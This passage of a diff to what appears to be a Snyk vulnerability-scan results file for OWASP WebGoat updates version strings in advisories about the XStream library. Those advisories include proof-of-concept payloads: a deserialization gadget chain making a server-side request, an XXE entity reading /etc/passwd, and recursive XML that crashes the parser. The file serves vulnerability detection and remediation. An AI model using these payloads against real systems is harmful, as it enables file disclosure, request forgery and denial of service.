 </indices>\r\n                  <getters>\r\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\r\n                  </getters>\r\n                  <accessors>\r\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\r\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\r\n                        <type>int</type>\r\n                        <field>\r\n                          <name>hash</name>\r\n                          <clazz>java.lang.String</clazz>\r\n                        </field>\r\n                      </val_-getter>\r\n                      <val_-isListType>false</val_-isListType>\r\n                      <val_-n>\r\n                        <namespaceURI/>\r\n                        <localPart>hash</localPart>\r\n                        <prefix/>\r\n                      </val_-n>\r\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\r\n                        <type>java.lang.String</type>\r\n                        <method>\r\n                          <class>jdk.nashorn.internal.runtime.Source</class>\r\n                          <name>readFully</name>\r\n                          <parameter-types>\r\n                            <class>java.net.URL</class>\r\n                          </parameter-types>\r\n                        </method>\r\n                      </val_-setter>\r\n                      <outer-class>\r\n                        <propertySetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field>\r\n                                <name>serialPersistentFields</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field>\r\n                                <name>CASE_INSENSITIVE_ORDER</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>long</type>\r\n                              <field>\r\n                                <name>serialVersionUID</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[C</type>\r\n                              <field>\r\n                                <name>value</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>hash</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>int</type>\r\n                              <field reference='../../../../../val_-getter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                        </propertySetters>\r\n                        <propertyGetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>long</type>\r\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                              <type>[C</type>\r\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>hash</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\r\n                          </entry>\r\n                        </propertyGetters>\r\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\r\n                        <contentClass>java.lang.String</contentClass>\r\n                        <elementDeclaredTypes/>\r\n                      </outer-class>\r\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                  </accessors>\r\n                  <wrapper>java.lang.Object</wrapper>\r\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\r\n                  <dynamicWrapper>false</dynamicWrapper>\r\n                </bodyBuilder>\r\n                <isOneWay>false</isOneWay>\r\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\r\n            </entry>\r\n          </stubHandlers>\r\n          <clientConfig>false</clientConfig>\r\n        </databinding>\r\n        <methodHandlers>\r\n          <entry>\r\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\r\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\r\n              <owner reference='../../../..'/>\r\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\r\n              <isVoid>false</isVoid>\r\n              <isOneway>false</isOneway>\r\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\r\n          </entry>\r\n        </methodHandlers>\r\n      </handler>\r\n    </dynamic-proxy>\r\n    <url>http://localhost:8080/internal/</url>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39150.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -882,14 +562,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.19 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-43859.html)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream and replace or inject objects, that result in exponential recursively hashcode calculation,\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.19 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-43859.html)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-400", "maven"],
                 "cvssv3_baseScore": 7.5,
                 "security-severity": "7.5"
               }
@@ -904,14 +580,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\r\n[`com.thoughtworks.xstream:xstream`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xstream%22) is a simple library to serialize objects to XML and back again.\r\nMultiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.\r\n\r\n# Details\r\n\r\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n   <username>John</username>\r\n</xml>\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n<!DOCTYPE foo [\r\n   <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\r\n   <username>&xxe;</username>\r\n</xml>\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\r\n\r\n# References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674)\r\n- [OSS Security](http://www.openwall.com/lists/oss-security/2016/03/28/1)\r\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/25)"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\r\n[`com.thoughtworks.xstream:xstream`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xstream%22) is a simple library to serialize objects to XML and back again.\r\nMultiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.\r\n\r\n# Details\r\n\r\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n   <username>John</username>\r\n</xml>\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of  `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n<!DOCTYPE foo [\r\n   <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\r\n   <username>&xxe;</username>\r\n</xml>\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\r\n\r\n# References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674)\r\n- [OSS Security](http://www.openwall.com/lists/oss-security/2016/03/28/1)\r\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/25)"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-200",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-200", "maven"],
                 "cvssv3_baseScore": 7.5,
                 "security-severity": "7.5"
               }
@@ -926,14 +598,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737)\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/314)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737)\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/314)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-400", "maven"],
                 "cvssv3_baseScore": 5.3,
                 "security-severity": "5.3"
               }
@@ -948,14 +616,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an `xstream.fromXML(\"&lt;void/>\")` call.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.10 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957)\n- [Vendor Advisory](http://x-stream.github.io/CVE-2017-7957.html)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an `xstream.fromXML(\"&lt;void/>\")` call.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.10 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957)\n- [Vendor Advisory](http://x-stream.github.io/CVE-2017-7957.html)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-20",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-20", "maven"],
                 "cvssv3_baseScore": 7.5,
                 "security-severity": "7.5"
               }
@@ -970,14 +634,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.\r\n\r\n# Workaround\r\n\r\nThis effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.\r\n\r\n# PoC\r\n\r\nCreate a simple HashSet and use XStream to marshal it to XML.  Replace the XML with following snippet and unmarshal it with XStream.\r\n\r\n```xml\r\n<div class=\"Source XML\"><pre>\r\n<set>\r\n  <set>\r\n    <set>\r\n      <set>\r\n        <set>\r\n          <set>\r\n            <string>a</string>\r\n          </set>\r\n          <set>\r\n            <string>b</string>\r\n          </set>\r\n        </set>\r\n        <set>\r\n          <string>c</string>\r\n          <set reference='../../../set/set[2]'/>\r\n        </set>\r\n      </set>\r\n    </set>\r\n  </set>\r\n</set>;\r\n</pre></div>\r\n<div class=\"Source Java\"><pre>XStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n</pre></div>\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391)\n- [XStream Advisory](http://x-stream.github.io/CVE-2022-41966.html)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.\r\n\r\n# Workaround\r\n\r\nThis effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.\r\n\r\n# PoC\r\n\r\nCreate a simple HashSet and use XStream to marshal it to XML.  Replace the XML with following snippet and unmarshal it with XStream.\r\n\r\n```xml\r\n<div class=\"Source XML\"><pre>\r\n<set>\r\n  <set>\r\n    <set>\r\n      <set>\r\n        <set>\r\n          <set>\r\n            <string>a</string>\r\n          </set>\r\n          <set>\r\n            <string>b</string>\r\n          </set>\r\n        </set>\r\n        <set>\r\n          <string>c</string>\r\n          <set reference='../../../set/set[2]'/>\r\n        </set>\r\n      </set>\r\n    </set>\r\n  </set>\r\n</set>;\r\n</pre></div>\r\n<div class=\"Source Java\"><pre>XStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n</pre></div>\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391)\n- [XStream Advisory](http://x-stream.github.io/CVE-2022-41966.html)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-400", "maven"],
                 "cvssv3_baseScore": 5.9,
                 "security-severity": "5.9"
               }
@@ -992,14 +652,10 @@
               },
               "help": {
                 "text": "",
